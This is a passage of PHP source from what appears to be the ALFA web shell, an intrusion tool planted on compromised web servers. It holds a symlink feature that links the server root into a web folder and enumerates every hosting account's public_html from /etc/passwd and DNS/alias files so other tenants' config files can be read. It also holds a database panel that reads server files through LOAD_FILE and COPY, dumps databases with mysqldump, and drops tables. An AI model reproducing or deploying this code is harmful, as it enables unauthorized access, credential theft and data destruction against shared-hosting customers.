4304 @__write_file($cginame,$source);
4305 @chmod($cginame,0755);
4306 echo __pre();
4307 $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
4308 if(strlen($resource) == 0){
4309 echo AlfaiFrameCreator('cgialfa/'.$cginame);
4310 }else{
4311 echo $resource;
4312 }
4313}
4314if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
4315if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
4316AlfaNum(9,10);
4317echo __pre().'
4318<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
4319<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
4320<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
4321<p><input type="submit" value=" " name="symlink" /></p></form></center>';
4322$path = $_POST['alfa5'];
4323$symname = $_POST['alfa6'];
4324$solevisible58 = $_POST['alfa7'];
4325if($solevisible58){
4326$new_name = str_replace(".", "_", basename($symname));
4327$rand_dir = $new_name.rand(111,9999);
4328$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
4329@mkdir($sym_dir, 0777, true);
4330alfacgihtaccess('sym', $sym_dir, $symname);
4331_alfa_symlink("$path","$sym_dir/$symname");
4332echo __pre();
4333echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.__ALFA_DATA_FOLDER__."/".$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
4334}
4335}else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
4336}
4337if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
4338$cant_symlink = true;
4339if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
4340@mkdir('alfasymlink',0777);
4341alfacgihtaccess('sym','alfasymlink/');
4342_alfa_symlink('/','alfasymlink/root');
4343$table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
4344if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
4345echo "<center>";
4346$lines = array();
4347$anony_domains = array();
4348$anonymous_users = array();
4349$f_black = array();
4350$error = false;
4351$anonymous = false;
4352$makepwd = "/home/{user}/public_html/";
4353$domains = alfaGetDomains();
4354$lines = $domains["lines"];
4355$state = $domains["state"];
4356$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
4357$can_runcmd = _alfa_can_runCommand(false,false);
4358if(!$is_posix && !$can_runcmd){
4359 $anonymous = true;
4360 $anony_domains = $domains["lines"];
4361 $lines = _alfa_file('/etc/passwd');
4362}
4363echo $table_header;
4364$count=1;
4365$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="'.__ALFA_DATA_FOLDER__.'/alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
4366foreach($lines as $line){
4367 $domain = "";
4368 $owner = "";
4369 if($anonymous){
4370 $explode = explode(":", $line);
4371 $owner = $explode[0];
4372 $owner_len = strlen($owner) - 1;
4373 $userid = $explode[2];
4374 if((int)$userid < 500)continue;
4375 $domain = "[?????]";
4376 $temp_black = array();
4377 $finded = false;
4378 foreach($anony_domains as $anony){
4379 if($state == "named.conf"){
4380 if(@strstr($anony, 'zone')){
4381 preg_match_all('#zone "(.*)"#',$anony, $data);
4382 $domain = $data[1][0];
4383 }else{
4384 continue;
4385 }
4386 }elseif($state == "named" || $state == "valiases"){
4387 if($anony == "." || $anony == "..")continue;
4388 if($state == "named")$anony = rtrim($anony, ".db");
4389 $domain = $anony;
4390 }
4391 $sub_domain = str_replace(array("-","."), "", $domain);
4392 if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
4393 if(in_array($owner.$domain, $temp_black))continue;
4394 $sympath = str_replace("{user}", $owner, $makepwd);
4395 $http = "http://".$domain;
4396 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
4397 $count++;
4398 $temp_black[] = $owner.$domain;
4399 $finded = true;
4400 }
4401 }
4402 if(!$finded){
4403 $anonymous_users[] = $owner;
4404 }
4405 }else{
4406 if($state == "named.conf"){
4407 if(@strstr($line, 'zone')){
4408 preg_match_all('#zone "(.*)"#',$line, $data);
4409 $domain = $data[1][0];
4410 }else{
4411 continue;
4412 }
4413 }elseif($state == "named" || $state == "valiases"){
4414 if($line == "." || $line == "..")continue;
4415 if($state == "named")$line = rtrim($line, ".db");
4416 $domain = $line;
4417 }
4418 if(strlen(trim($domain)) > 2 && $state != "passwd"){
4419 if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
4420 if($is_posix){
4421 $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
4422 $owner = $user["name"];
4423 }elseif($can_runcmd){
4424 $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
4425 }
4426 }
4427 }
4428 if(!$anonymous){
4429 if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
4430 $sympath = str_replace("{user}", $owner, $makepwd);
4431 $http = "http://".$domain;
4432 if($state == "passwd"){
4433 $http = "javascript:alert('we cant find domain...')";
4434 }
4435 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
4436 $count++;
4437 $f_black[] = $owner.$domain;
4438 }
4439}
4440if($anonymous){
4441 foreach($anonymous_users as $owner){
4442 $sympath = str_replace("{user}", $owner, $makepwd);
4443 $http = "javascript:alert('we cant find domain...')";
4444 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
4445 $count++;
4446 }
4447}
4448$cant_symlink = false;
4449}else{
4450$is_direct = false;
4451$makepwd = alfaMakePwd();
4452if(_alfa_file_exists("/etc/virtual/domainowners")){
4453 $makepwd = "/home/{user}/public_html";
4454 $is_direct = true;
4455}
4456$sole = _alfa_file("/etc/virtual/domainowners");
4457$count=1;
4458echo $table_header;
4459$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="'.__ALFA_DATA_FOLDER__.'/alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
4460if($sole){
4461 foreach($sole as $visible){
4462 if(@strstr($visible,":")){
4463 $solevisible = explode(':', $visible);
4464 $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
4465 echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
4466 }
4467 }
4468}else{
4469 $passwd = _alfa_file("/etc/passwd");
4470 if($passwd){
4471 $html = "";
4472 $is_named = false;
4473 $users = array();
4474 $domains = array();
4475 $uknowns = array();
4476 foreach($passwd as $user){
4477 $user = trim($user);
4478 $expl = explode(":", $user);
4479 if((int)$expl[2] < 500)continue;
4480 $users[$expl[0]] = $expl[5];
4481 }
4482 $site_domains = @scandir("/etc/virtual/");
4483 if(!$site_domains){
4484 $site_domains = alfaEx("ls /etc/virtual/");
4485 $site_domains = explode("\n", $site_domains);
4486 if(!$site_domains){
4487 $site_domains = _alfa_file("/etc/named.conf");
4488 if($site_domains){$is_named = true;}
4489 }
4490 }
4491 foreach($site_domains as $line){
4492 if($is_named){
4493 if(@strstr($line, 'zone')){
4494 preg_match_all('#zone "(.*)"#',$line, $data);
4495 $domain = $data[1][0];
4496 if(strlen($domain > 2) && !empty($domain)){
4497 $domains[] = $domain;
4498 }
4499 }
4500 }else{
4501 $domains[] = $line;
4502 }
4503 }
4504 $x = 1;
4505 foreach($users as $user => $home){
4506 foreach($domains as $domain){
4507 $user_len = strlen($user) - 1;
4508 $sub_domain = str_replace(array("-","."), "", $domain);
4509 $five_user = substr($user, 0,$user_len);
4510 $five_domain = substr($sub_domain, 0,$user_len);
4511 if($five_user == $five_domain){
4512 if($is_direct){
4513 $cwd = str_replace("{user}", $user, $makepwd);
4514 }else{
4515 $expl = explode("}/", $makepwd);
4516 $cwd = $home."/".$expl[1];
4517 }
4518 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
4519 }else{
4520 $uknowns[$user] = $home;
4521 }
4522 }
4523 }
4524 $uknowns = array_unique($uknowns);
4525 foreach($uknowns as $user => $home){
4526 if($is_direct){
4527 $cwd = str_replace("{user}", $user, $makepwd);
4528 }else{
4529 $expl = explode("}/", $makepwd);
4530 $cwd = $home."/".$expl[1];
4531 }
4532 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
4533 }
4534 echo($html);
4535 }
4536}
4537echo "</table>";
4538$cant_symlink = false;
4539}
4540}else{
4541 echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
4542 $cant_symlink = false;
4543}
4544if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
4545echo "</center></table>";
4546}
4547echo "</div>";
4548alfafooter();
4549}
4550function alfasql(){
4551class DbClass{
4552public $type;
4553public $link;
4554public $res;
4555public $mysqli_connect_error = false;
4556public $mysqli_connect_error_msg = "";
4557function __construct($type){
4558$this->type = $type;
4559}
4560function connect($host, $user, $pass, $dbname){
4561switch($this->type){
4562case 'mysql':
4563if($this->link = @mysqli_connect($host,$user,$pass,$dbname)){
4564 return true;
4565}else{
4566 $this->mysqli_connect_error = true;
4567 $this->mysqli_connect_error_msg = mysqli_connect_error();
4568 return false;
4569}
4570break;
4571case 'pgsql':
4572$host = explode(':', $host);
4573if(!$host[1]) $host[1]=5432;
4574if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
4575break;
4576}
4577return false;
4578}
4579function selectdb($db){
4580switch($this->type){
4581case 'mysql':
4582if(@mysqli_select_db($db))return true;
4583break;
4584}
4585return false;
4586}
4587function query($str){
4588switch($this->type){
4589case 'mysql':
4590return $this->res = @mysqli_query($this->link,$str);
4591break;
4592case 'pgsql':
4593return $this->res = @pg_query($this->link,$str);
4594break;
4595}
4596return false;
4597}
4598function fetch(){
4599$res = func_num_args()?func_get_arg(0):$this->res;
4600switch($this->type){
4601case 'mysql':
4602return @mysqli_fetch_assoc($res);
4603break;
4604case 'pgsql':
4605return @pg_fetch_assoc($res);
4606break;
4607}
4608return false;
4609}
4610function listDbs(){
4611switch($this->type){
4612case 'mysql':
4613return $this->query("SHOW databases");
4614break;
4615case 'pgsql':
4616return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
4617break;
4618}
4619return false;
4620}
4621function listTables(){
4622switch($this->type){
4623case 'mysql':
4624return $this->res = $this->query('SHOW TABLES');
4625break;
4626case 'pgsql':
4627return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
4628break;
4629}
4630return false;
4631}
4632function error(){
4633switch($this->type){
4634case 'mysql':
4635return @mysqli_error($this->link);
4636break;
4637case 'pgsql':
4638return @pg_last_error();
4639break;
4640}
4641return false;
4642}
4643function setCharset($str){
4644switch($this->type){
4645case 'mysql':
4646if(function_exists('mysql_set_charset'))
4647return @mysqli_set_charset($this->link,$str);
4648else
4649$this->query('SET CHARSET '.$str);
4650break;
4651case 'pgsql':
4652return @pg_set_client_encoding($this->link, $str);
4653break;
4654}
4655return false;
4656}
4657function loadFile($str){
4658switch($this->type){
4659case 'mysql':
4660return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
4661break;
4662case 'pgsql':
4663$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
4664$r=array();
4665while($i=$this->fetch())
4666$r[] = $i['file'];
4667$this->query('drop table solevisible');
4668return array('file'=>implode("\n",$r));
4669break;
4670}
4671return false;
4672}
4673};
4674$db = new DbClass($_POST['type']);
4675alfahead();
4676$form_visibility = "table";
4677if(isset($_POST['sql_host'])){
4678 $connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
4679 if($connection_db && !empty($_POST['sql_base'])){
4680 $form_visibility = "none";
4681 }
4682}
4683$database_list = array();
4684echo "
4685<div class='header' style='min-height:300px;'>".($form_visibility!="none"?"<center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center><div style='text-align:center;margin-bottom: 10px;'><button class='connection-his-btn db-opt-id' onclick='alfaShowConnectionHistory(this);' mode='on'>Connection History</button><div class='connection_history_holder'></div></div>":"")."
4686<div class='sf' class='db-opt-id'><table style='margin: 0 auto;".($form_visibility=="none"?"display:none;":"")."' cellpadding='2' cellspacing='0'><tr>
4687<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
4688<td><select name='type'><option value='mysql' selected>mysql</option></select></td>
4689<td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
4690<td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
4691<td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
4692$tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
4693if(isset($_POST['sql_host'])){
4694if($connection_db){
4695$db->setCharset('utf8');
4696$db->listDbs();
4697echo "<select name=sql_base><option value=''></option>";
4698while($item = $db->fetch()) {
4699list($key, $value) = each($item);
4700$database_list[] = $value;
4701echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
4702}
4703echo '</select>';
4704}else{
4705 echo $tmp;
4706}
4707}else
4708echo $tmp;
4709$curr_mysql_id = $_POST['current_mysql_id'];
4710echo "</td>
4711<td><button onclick='fs(this);return false;' class='db-opt-id db-connect-btn'>Connect</button></td>
4712<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
4713</tr>
4714</table>";
4715if($db->mysqli_connect_error){
4716 echo '<div style="text-align: center;font-size: 17px;margin-top: 18px;">'.$db->mysqli_connect_error_msg.'</div>';
4717}
4718if(!empty($curr_mysql_id)){
4719 $sql_title_db = "";
4720 if(!empty($_POST['sql_base'])){
4721 $sql_title_db = "d.querySelector('#tab_".$curr_mysql_id." span').innerHTML='".addslashes($_POST['sql_base'])."';";
4722 }
4723 echo "<script>mysql_cache['".$curr_mysql_id."']['host']='".addslashes($_POST['sql_host'])."';mysql_cache['".$curr_mysql_id."']['user']='".addslashes($_POST['sql_login'])."';mysql_cache['".$curr_mysql_id."']['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['".$curr_mysql_id."']['db']='".addslashes($_POST['sql_base'])."';mysql_cache['".$curr_mysql_id."']['charset']='".addslashes($_POST['charset'])."';mysql_cache['".$curr_mysql_id."']['type']='".addslashes($_POST['type'])."';mysql_cache['".$curr_mysql_id."']['count']='".addslashes($_POST['sql_count'])."';".$sql_title_db."alfaConnectionHistoryUpdate();</script>";
4724}
4725if(isset($db) && $db->link){
4726if(!empty($_POST['sql_base'])){
4727echo "<div class='mysql-main'><div mode='block' onclick='alfaMysqlTablePanelCtl(this);' class='tables-panel-ctl db-opt-id'><<</div><div class='mysql-tables'><div><input placeholder=\"Filter Table\" style='padding: 0;margin-left: 11px;text-align:center;' type='text' name='filter_all'><button class='db-opt-id' onclick='alfaMysqlFilterAllTable(this);return false;'>Search</button></div><div class='block'><a sql_count='".(empty($_POST['sql_count'])?"false":"true")."' mode='closed' onclick='alfaMysqlFilterAllTable(this,true);' class='expander parent-expander db-opt-id' href='javascript:void(0);'><img src='http://solevisible.com/icons/menu/b_plus.png' title='Expand/Collapse All DataBases' alt='Expand/Collapse All DataBases'></a></div><ul style='margin-top: 28px;'>";
4728foreach ($database_list as $db_name) {
4729 echo '<li><div class="block"><i></i><b></b><a sql_count="'.(empty($_POST['sql_count'])?"false":"true").'" db_target="'.$db_name.'" onclick="alfaMysqlExpander(this);" class="expander cls-'.$db_name.'-expander db-opt-id" href="javascript:void(0);"><img src="http://solevisible.com/icons/menu/'.($db_name == $_POST['sql_base']?"b_minus.png":"b_plus.png").'" title="Expand/Collapse" alt="Expand/Collapse"></a></div><span class="db_name">'.$db_name.'</span><div class="clearfloat"></div><div db_name="'.$db_name.'" mode="'.($db_name == $_POST['sql_base']?"loaded":"no").'" class="list_container cls-'.$db_name.'"><div>';
4730 if($db_name == $_POST['sql_base']){
4731 $db->selectdb($_POST['sql_base']);
4732 $tbls_res = $db->listTables();
4733 echo '<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" target=".cls-'.$db_name.'" placeholder="Filter Table" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';
4734 while($item = $db->fetch($tbls_res)){
4735 list($key, $value) = each($item);
4736 if(!empty($_POST['sql_count']))
4737 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
4738 $value = htmlspecialchars($value);
4739 echo "<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='".$value."'> <a class='db-opt-id' db_target='".$db_name."' href='javascript:void(0);' onclick=\"alfaLoadTableData(this,'".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?' ':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</div></li>";
4740 }
4741 echo '</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" class="db-opt-id" target=".cls-'.$db_name.'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" target=".cls-'.$db_name.'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" class="db-opt-id" db_target="'.$db_name.'" target=".cls-'.$db_name.'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>';
4742 }
4743 echo "</div></li>";
4744}
4745echo "</ul></div><div class='mysql-query-results'><div class='mysql-query-result-tabs'><div class='db-opt-id mysql-query-selected-tab' target='.mysql-query-result-content' onclick='alfaMysqlTabCtl(this);'>Result</div><div class='db-opt-id' target='.mysql-query-form' onclick='alfaMysqlTabCtl(this);'>Query</div><div class='db-opt-id' target='.mysql-search-area' onclick='alfaMysqlTabCtl(this);'>Search</div><div class='db-opt-id' target='.mysql-structure' onclick='alfaMysqlTabCtl(this);'>Structure</div><div class='db-opt-id' target='.mysql-insert-row' onclick='alfaMysqlTabCtl(this);'>Insert</div><div style='display:none;' class='db-opt-id' target='.mysql-edit-row' onclick='alfaMysqlTabCtl(this);'>Edit</div></div><div class='mysql-query-content mysql-insert-row mysql-hide-content'></div><div class='mysql-query-content mysql-edit-row mysql-hide-content'></div><div class='mysql-query-content mysql-search-area mysql-hide-content'></div><div class='mysql-query-content mysql-structure mysql-hide-content'></div><div class='mysql-query-content mysql-query-form mysql-hide-content'><div style='margin-bottom: 5px;'><span>Query:</span></div><textarea name='query' style='width:90%;height:100px'></textarea><p><div style='float:left;margin-left: 30px;'><input class='button db-opt-id' db_target='".$_POST['sql_base']."' onclick='alfaMysqlQuery(this);return false;' type='submit' value=' '></div></p></div><div class='mysql-query-content mysql-query-result-content'><div class='mysql-query-result-header'><div style='margin-bottom: 10px;' class='mysql-query-reporter'></div><div class='mysql-query-pager'></div></div><div class='mysql-query-table'></div></div></form></td></tr>";
4746}
4747echo "</table></div>";
4748echo "</div>";
4749}else{
4750echo htmlspecialchars($db->error());
4751}
4752echo '</div>';
4753alfafooter();
4754}
4755function alfaSql_manager_api(){
4756 $db = $_POST["alfa1"];
4757 $type = $_POST["alfa2"];
4758 $sql_count = $_POST["alfa3"] == "true" ? true : false;
4759 $db = @json_decode($db, true);
4760 $conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]);
4761 @mysqli_set_charset($conn, "utf8");
4762 if($conn){
4763 if($type == "load_all_tables"){
4764 $tables = array();
4765 $q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('".implode("','", $db["databases"])."');");
4766 $count = 0;
4767 while($row = @mysqli_fetch_assoc($q_tables)){
4768 if($sql_count){
4769 $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row["table_schema"].'`.`'.$row["table_name"].'`');
4770 if($count_q){
4771 $count = @mysqli_fetch_row($count_q);
4772 $count = $count[0];
4773 }
4774 }
4775 $tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int)$count);
4776 }
4777 foreach($db["databases"] as $db){
4778 if(!isset($tables[$db])){
4779 $tables[$db] = null;
4780 }
4781 }
4782 echo @json_encode($tables);
4783 }elseif($type == "dump_drop"){
4784 if($db["mode"] == "drop"){
4785 foreach ($db["tables"] as $table) {
4786 @mysqli_query($conn, "DROP TABLE `".$table."`;");
4787 }
4788 $tables = array();
4789 $q_tables = @mysqli_query($conn, "SHOW TABLES;");
4790 $count = 0;
4791 while($row = @mysqli_fetch_array($q_tables)){
4792 if($sql_count){
4793 $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');
4794 if($count_q){
4795 $count = @mysqli_fetch_row($count_q);
4796 $count = $count[0];
4797 }
4798 }
4799 $tables[] = array("name" => $row[0], "count" => (int)$count);
4800 }
4801 echo @json_encode($tables);
4802 }else{
4803 if(strlen(alfaEx("mysqldump"))>0){
4804 alfaEx("mysqldump --single-transaction --host=\"".$db["host"]."\" --user=\"".$db["user"]."\" --password=\"".$db["pass"]."\" ".$db["db"]." ".implode(" ", $db["tables"])." > ".$db["dump_file"]);
4805 }else{
4806 $fp = @fopen($db["dump_file"], "w");
4807 foreach ($db["tables"] as $table) {
4808 $res = @mysqli_query($conn, 'SHOW CREATE TABLE `'.$table.'`');
4809 $create = @mysqli_fetch_array($res);
4810 $sql = "DROP TABLE IF EXISTS `".$table."`;\n" . $create[1].";\n";
4811 if($fp) fwrite($fp, $sql); else echo($sql);
4812 $tbl_data = @mysqli_query($conn, 'SELECT * FROM `'.$table.'`');
4813 $head = true;
4814 while($item = @mysqli_fetch_assoc($tbl_data)){
4815 $columns = array();
4816 foreach($item as $k=>$v) {
4817 if($v == null)
4818 $item[$k] = "''";
4819 elseif(is_numeric($v))
4820 $item[$k] = $v;
4821 else
4822 $item[$k] = "'".@mysqli_real_escape_string($conn, $v)."'";
4823 $columns[] = "`".$k."`";
4824 }
4825 if($head) {
4826 $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
4827 $head = false;
4828 } else
4829 $sql = "\n\t,(".implode(", ", $item).')';
4830 if($fp) fwrite($fp, $sql); else echo($sql);
4831 }
4832 if(!$head)
4833 if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
4834 }
4835 }
4836 echo @json_encode(array("status" => true, "file" => $db["dump_file"]));
4837 }
4838 }elseif($type == "load_tables"){
4839 $tables = array();
4840 $q_tables = @mysqli_query($conn, "SHOW TABLES;");
4841 $count = 0;
4842 while($row = @mysqli_fetch_array($q_tables)){
4843 if($sql_count){
4844 $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');
4845 if($count_q){
4846 $count = @mysqli_fetch_row($count_q);
4847 $count = $count[0];
4848 }
4849 }
4850 $tables[] = array("name" => $row[0], "count" => (int)$count);
4851 }
4852 echo @json_encode($tables);
4853 }elseif($type == "alter"){
4854 $db["alter"]["type"] = strtolower($db["alter"]["type"]);
4855 $inputs = $db["alter"]["type"]."(".$db["alter"]["input"].")";
4856 $text_input = array("longtext", "text", "mediumtext", "tinytext");
4857 if(in_array($db["alter"]["type"], $text_input)){
4858 $inputs = $db["alter"]["type"];
4859 }
4860 @mysqli_query($conn, "ALTER TABLE `".$db["table"]."` MODIFY COLUMN `".$db["column"]."` " . $inputs);
4861 $error = @mysqli_error($conn);
4862 if($error){
4863 echo $error;
4864 }else{
4865 echo "ok";
4866 }
4867 }elseif($type == "edit" || $type == "delete" || $type == "delete_all"){
4868 if($type == "edit"){
4869 $q = @mysqli_query($conn, "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` = '".addslashes($db["key"])."' LIMIT 0,1");
4870 $row = @mysqli_fetch_assoc($q);
4871 if($row){
4872 $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'");
4873 $columns = array();
4874 $edit_data = array();
4875 while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
4876 $input = array("col_type" => $row2["COLUMN_TYPE"]);
4877 $row2["type"] = strtolower($row2["type"]);
4878 switch($row2["type"]){
4879 case "longtext": case "text": case "mediumtext": case "tinytext":
4880 $input["tag"] = "textarea";
4881 break;
4882 case "int": case "smallint": case "bigint": case "tinyint": case "mediumint":
4883 $input["tag"] = "input";
4884 $input["type"] = "number";
4885 break;
4886 default:
4887 $input["tag"] = "input";
4888 $input["type"] = "text";
4889 }
4890 $columns[$row2["name"]] = $input;
4891 }
4892 foreach($row as $key => $v){
4893 $edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'), "type" => $columns[$key]);
4894 }
4895 echo @json_encode($edit_data);
4896 }
4897 }else{
4898 if($type == "delete_all"){
4899 $rows = implode("', '", $db["rows"]);
4900 }else{
4901 $rows = addslashes($db["key"]);
4902 }
4903 $query = "DELETE FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` IN ('".$rows."')";
4904 @mysqli_query($conn, $query);
4905 $error = @mysqli_error($conn);
4906 if($error){
4907 $status = false;
4908 }else{
4909 $status = true;
4910 }
4911 echo @json_encode(array("status" => $status, "error" => $error, "query" => $query));
4912 }
4913 }elseif($type == "update"){
4914 $query = "UPDATE `".$db["db"]."`.`".$db["table"]."` SET ";
4915 foreach($db["data"] as $col => $val){
4916 $query .= "`".$col."` = '".mysqli_real_escape_string($conn, $val)."',";
4917 }
4918 $query = substr($query, 0, -1);
4919 $query .= "WHERE `".$db["col_key"]."` = '".$db["key"]."'";
4920 $res = @mysqli_query($conn, $query);
4921 echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
4922 }elseif($type == "insert"){
4923 $query = "INSERT INTO `".$db["db"]."`.`".$db["table"]."` ";
4924 foreach($db["data"] as $col => $val){
4925 $cols .= $col . ",";
4926 $vals .= "'".mysqli_real_escape_string($conn, $val)."',";
4927 }
4928 $cols = substr($cols, 0, -1);
4929 $vals = substr($vals, 0, -1);
4930 $query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")";
4931 $res = @mysqli_query($conn, $query);
4932 echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
4933 }else{
4934 $pages = 0;
4935 $title = false;
4936 $query = "";
4937 $tbl_content = '<table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
4938 $line = 0;
4939 $tables = array();
4940 $columns = array();
4941 if($type == "load_data"){
4942 $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT 0,30";
4943 $tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `".$db["db"]."`.`".$db["table"]."`");
4944 $tbl_count = @mysqli_fetch_row($tbl_count_q);
4945 $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'");
4946 while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
4947 $columns[] = $row2;
4948 }
4949 if($tbl_count[0] > 30){
4950 $pages = ceil($tbl_count[0] / 30);
4951 }
4952 }elseif($type == "query"){
4953 $query = $db["query"];
4954 }elseif($type == "page"){
